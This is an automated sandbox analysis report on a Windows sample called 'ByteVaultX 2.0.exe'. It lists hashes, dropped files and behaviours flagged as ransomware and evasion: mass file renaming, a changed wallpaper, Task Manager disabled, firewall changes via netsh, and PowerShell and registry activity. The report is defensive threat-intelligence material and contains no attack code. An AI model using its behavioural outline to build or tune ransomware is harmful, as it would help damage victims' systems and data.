SHA256 69cbec7c741e79dbbf1c8ab1046eb8edd0585f7ad56432e9a341114ec51b4c2a
SHA512 f7a0074ff42f81c4eac7815c16b29a902ac933e8367698678e05582d6b6d237a20f1b282451d4112085e4479e179cb54960831d459c91109168363cb9276c782

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77f69b27d0f1410e425839bd504d948f
SHA1 812d76f81bfcad255062466dc7f605ab34a63138
SHA256 b7230c73b85ac75d9b1e0a28c4291e31eeebabcc8c713cea8fc1abe47b200fde
SHA512 40bbf3d9923f6abffd144e3ce6ad38e826775c26fb2651ccde5794cdac4a4f0aaa73b261c503ad2406ecc4fd653220f2900a377b3126e2b14c84071dc8d11085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 30d64d473d1e0b8497b7e248f497af06
SHA1 53781fa956a1dfcf1f0e1705b396ae94c6341071
SHA256 914381795efc09819ba2cd896d44755044c518054e880bd1f4eabea94005103a
SHA512 1e89c2ebf26c57f6bc73219ad8428b2e18be654756c3f34d0f605f37c19a5edad7fd0c27b22667e4702f80777f03346fbe9cdc126d901c802a9424656dd8664d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 981885dcbb81d31ef4652aaf4ab6e17a
SHA1 c0447bc83f1a476cffec182ed9c7746cbfe8d2a7
SHA256 c20a8b4aa5e3be9af035057a9b4386445ee1d83fe9fa36080df037bb6f762a13
SHA512 8c0b5db1b8c4b760c25b19ab0de3657bfb640babfabe400fb1462a3193d5b6d59dadeb8c97535f0dda6954717f90ff44451d273465ae13acc043d5dc83d707a0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e354695a664678a6d6ac3b7d92c553ea
SHA1 13d038a6a9ca1f5c2f4ed234cd78adedfe2a2a30
SHA256 c21a61526ab6902dc615a88c6319c626ca123626a10477e384145b7e5140201c
SHA512 929e2f18d44f4e393d1da77ff3c8f95cddb83bb290a79f46b77e51d820e1f9adae4feaf62470384ea7c736d662ad73389b268d3ac64b72d39804921c55c632e8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1189a72e42e2321edf1ed3a8d5568687
SHA1 a2142fc754d6830de107d9d46f398483156f16a6
SHA256 009aee0a5f2d25ed79160e75cde58722def11663334ed20283e3afca32f971ea
SHA512 b1eb9b7aa7a57d0acec93b8152229b1f274a8d1b8f19133513486587f39b0636a9df89ddc6c2013e001d831f2b23cd0bb0fc084131824ea8e1dff134cd6d4f29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3da987a7d5d8e16626e0a3ce65f3e920
SHA1 2694a4fd9d2cc3c6048b5870f4ef9063e1b4a181
SHA256 97c482c6b4f613c455beb14d3198e4e3ef896ed9a67b2d7422ae000e442b433c
SHA512 6e80ec5f97eb09b28ba814945297687f70192dbe792b2a3dfe8cdd587361a63c83f215bd7c84fa8b573d2578e7e6bfe0c69d2a888044ad1cf8f55020b023aea9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5704afdde579f07e76e23103b1754102
SHA1 f7a5dd2cf5eaeacfd9c843e5a76114dd1c8b7a7b
SHA256 0cf2b0a35a4e3d3c2805d3dba68d047c18fa02945b12e3433b1426d54a2866ca
SHA512 bdf94e16965ebfe158ae5521c7e3d8fce3e0b42c4f7f67aa285decb8d5f115df762c075090d2c8ae0ab44fb809e7c93dae49f5a7c9bd7535ac2b50d5f922c232

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 09d02e85f682166b20fdf2f19bd61a4d
SHA1 646c890d839a9a88ed87550086a8568d6683d363
SHA256 f37127ca89d9b0346631e0617f0cc0a109d6c0c3ca482496d166338c3a0cdaaf
SHA512 c0f3de56491cd4a004a40729e9446a07f2039c5f78fddb4634e31724569da959273c0e4e64401d5d6bb92c192100a55ae6735e2cf6e750d9fc1fa0f0b0e069c9

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 23:42

Reported

2024-05-26 00:00

Platform

win10-20240404-en

Max time kernel

931s

Max time network

1035s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (132) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
